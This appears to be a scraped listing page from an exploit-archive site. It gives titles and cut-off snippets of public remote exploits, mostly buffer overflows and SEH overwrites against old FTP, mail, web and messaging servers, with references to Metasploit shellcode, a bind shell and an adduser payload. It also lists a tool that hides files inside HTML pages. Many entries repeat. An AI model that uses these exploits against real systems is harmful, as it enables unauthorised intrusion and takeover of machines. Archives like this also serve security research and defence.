Freefloat FTP Server 1.0 Buffer Overflow

Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow Date: 08/22/2023 Exploit Author: Waqas Ahmed Faroouqi ZEROXINN Vendor Homepage: http://www.freefoat.com Version: 1.0 Tested on Windows XP SP3 !/usr/bin/python import socket Metasploit Shellcode msfvenom -p...

EmbedInHTML - Embed and hide any file in an HTML file

What this tool does is taking a file any type of file, encrypt it, and embed it into an HTML file as ressource, along with an automatic download routine simulating a user clicking on the embedded ressource. Then, when the user browses the HTML file, the embedded file is decrypted on the fly, save...

MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BOF Exploit

No description provided by source. !/usr/bin/perl ================================================================= MailEnable Professional = 3.13 FETCH post-auth buffer overflow ================================================================= Bind Shell POC Exploit for Win2K SP4 pro English Fou...

AOL Instant Messenger AIM "Away" Message Remote Exploit

No description provided by source. / CAN-2004-0636 / / AIM Away Message Buffer Overflow Exploit Exploit by John Bissell A.K.A. HighT1mes Exploit: ======== drizzit.c Vulnerable Software: ==================== - AIM 5.5.3588 - AIM 5.5.3590 Beta - AIM 5.5.3591 - AIM 5.5.3595 and a couple others...

CamShot 1.2 - SEH Overwrite Exploit

No description provided by source. CamShot SEH overwrite by tecnik import socket, sys if lensys.argv!=2: print Usage: camshot.py target exit s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectsys.argv1,80 print Sending Exploit to: + sys.argv1 GET request + overflow string request =GET /...

Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x

No description provided by source. !/usr/bin/python Exploit Title: Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x Date: 29 dec 2009 Author: Emanuele 'emgent' Gentili and Emanuele 'crossbower' Acri Software Link: N/A Version: IIS 5.x/6.x Tested on: Windows 2003 Server SP...

Easy FTP 1.7.0.11 Buffer Overflow

Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands Remote Buffer Overflow Exploit Date: 10/8/2010 Author: Rabih Mohsen Software Link:http://code.google.com/p/easyftpsvr/downloads/detail?name=easyftp-server-1.7.0.11-cn.zip Version: 1.7.0.11 Tested on:...

CamShot v1.2 SEH Overwrite Exploit

Exploit for unknown platform in category remote exploits ================================== CamShot v1.2 SEH Overwrite Exploit ================================== CamShot SEH overwrite by tecnik import socket, sys if lensys.argv!=2: print "Usage: camshot.py " exit s = socket.socketsocket.AFINET,...

CamShot 1.2 - Overwrite (SEH)

CamShot SEH overwrite by tecnik import socket, sys if lensys.argv!=2: print "Usage: camshot.py " exit s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectsys.argv1,80 print "Sending Exploit to:" + sys.argv1 GET request + overflow string request ="GET /" request...

CamShot 1.2 - Overwrite (SEH)

CamShot 1.2 - Overwrite SEH CamShot SEH overwrite by tecnik import socket, sys if lensys.argv!=2: print "Usage: camshot.py " exit s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectsys.argv1,80 print "Sending Exploit to:" + sys.argv1 GET request + overflow string request ="GET /" request...

CamShot SEH Overwrite Exploit

CamShot SEH overwrite by tecnik import socket, sys if lensys.argv!=2: print "Usage: camshot.py " exit s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectsys.argv1,80 print "Sending Exploit to:" + sys.argv1 GET request + overflow string request ="GET /" request...

Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities

!/usr/bin/python Exploit Title: Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x Date: 29 dec 2009 Author: Emanuele 'emgent' Gentili and Emanuele 'crossbower' Acri Software Link: N/A Version: IIS 5.x/6.x Tested on: Windows 2003 Server SP2 CVE : N/A Code :...

MS IIS 5.0/6.0 FTP Server remote overflow vulnerability(win2k)-vulnerability warning-the black bar safety net

IIS 5.0 FTPd / Remote r00t exploit Win2k SP4 targets bug found &exploited by Kingcope, kcope2atgooglemail.com Affects IIS6 with stack cookie protection August 2 0 0 9 - KEEP THIS 0DAY PRIV8 use I:Socket; $|=1; metasploit shellcode, adduser "winown:nwoniw" $sc =...

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

No description provided by source. IIS 5.0 FTPd / Remote r00t exploit Win2k SP4 targets bug found & exploited by Kingcope, kcope2atgooglemail.com Affects IIS6 with stack cookie protection August 2009 - KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; metasploit shellcode, adduser "winown:nwoniw" $sc =...

Microsoft IIS FTP Server Stack Overflow

IIS 5.0 FTPd / Remote r00t exploit Win2k SP4 targets bug found & exploited by Kingcope, kcope2googlemail.com Affects IIS6 with stack cookie protection August 2009 - KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; metasploit shellcode, adduser "winown:nwoniw" $sc =...

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

Exploit for windows platform in category remote exploits ====================================================================== Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit win2k ====================================================================== IIS 5.0 FTPd / Remote r00t...

freeSSHd 1.2.1 - &#039;rename&#039; Remote Buffer Overflow (SEH)

FreeSSHd 1.2.1 rename Remote Buffer Overflow Exploit Advisory: http://www.bmgsec.com.au/advisory/45/ Original: http://www.bmgsec.com.au/advisory/32/ Related : http://www.bmgsec.com.au/advisory/42/ Test box: WinXP Pro SP2 English Exploit code for a vulnerability I discovered sometime ago in FreeSS...

SasCam WebCam Server 2.6.5 ActiveX Remote BOF Exploit

Exploit for unknown platform in category remote exploits ===================================================== SasCam WebCam Server 2.6.5 ActiveX Remote BOF Exploit ===================================================== Sub rootIT puts0m3shit = String8293, "a" eip = unescape"%EC%7E%E3%77" // call...

savant-overflow.txt

!/usr/bin/perl -w exploit for Savant webserver 3.1 remote bof shellcode bind 4444 port on target host Jacopo cervini aka [email protected] use IO::Socket; if!$ARGV1 print "Uso: savant-3.1.pl \n\n"; exit; $victim = IO::Socket::INET-newProto='tcp', PeerAddr=$ARGV0, PeerPort=$ARGV1 or die "can't conne...

Savant 3.1 Get Request Remote Overflow Exploit (Universal)

No description provided by source. !/usr/bin/perl -w exploit for Savant webserver 3.1 remote bof shellcode bind 4444 port on target host Jacopo cervini aka [email protected] use IO::Socket; if!$ARGV1 print "Uso: savant-3.1.pl victim port\n\n"; exit; $victim = IO::Socket::INET-newProto='tcp',...